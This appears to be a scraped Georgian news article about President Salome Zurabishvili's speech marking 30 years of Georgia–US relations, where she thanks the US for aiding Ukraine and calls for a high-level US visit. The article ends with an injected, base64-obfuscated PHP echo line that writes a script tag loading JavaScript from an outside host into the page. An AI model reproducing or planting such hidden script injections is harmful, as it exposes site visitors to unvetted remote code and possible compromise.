celsiusi
ავერსი საქკაბელი
საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა საქართველოსა და ამერიკის დიპლომატიური ურთიერთობების 30 წლისთავის აღსანიშნავ ღონისძიებაზე სიტყვით გამოსვლისას, უკრაინაში ომზე ისაუბრა და ამერიკას მადლობა გადაუხადა უკრაინელი ხალხის დახმარებისთვის.
 
სალომე ზურაბიშვილმა აშშ-ს როგორც უკრაინაში, ისე მთელ რეგიონში მეტი ჩართულობისკენ მოუწოდა და აღნიშნა, რომ დროა და კარგი იქნებოდა მაღალი რანგის ვიზიტები. პრეზიდენტმა სურვილი გამოთქვა ამერიკის პრეზიდენტი ეწვიოს საქართველოს.
 
„ჩვენი, საქართველოს თხოვნა იქნება, რომ აქ დაგვიანდა უკვე მაღალი დონის ვიზიტები, დროა, ქართველი ხალხი ამას ელოდება, რომ აქ ჩამოვიდნენ მაღალი დონის ვიზიტორები, თუნდაც  პრეზიდენტი. ამერიკის პრეზიდენტი რომელიც აქ იყო და მივიღეთ ისე, როგორც არცერთი სხვა ქვეყნის და, მგონი, დროა გავიმეოროთ.
 
ეს არის გადამწყვეტი ბრძოლა და პერიოდი და ეს ყველამ ძალიან კარგად უნდა დავინახოთ. ყველა უნდა ვიდგეთ იქ სადაც უნდა ვიდგეთ, ყველას არ შეუძლია ერთნაირად გამოხატოს სოლიდარობა, არიან დიდი და პატარა ქვეყნები, არიან სხვადასხვა გეოპოლიტიკური ადგილმდებარეობის ქვეყნები. ჩვენ ვიცით, რომ არ გვიცავს მეხუთე მუხლი და ჩვენი მისწრაფება, რომ ერთ დღეს ჩვენც ვიყოთ იმ ხაზის მეორე მხარეს, სადაც შეგიძლია იყო უფრო გამბედავი და უფრო სხვანაირად გამოთქვა შენი ხედვა და მხარდაჭერა, მაგრამ სოლიდარობა ყველას გვევალება და ყველა ვართ ერთად და ყველა სოლიდარული უკრაინელი ხალხის მიმართ", - განაცხადა სალომე ზურაბიშვილმა.
 
865
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");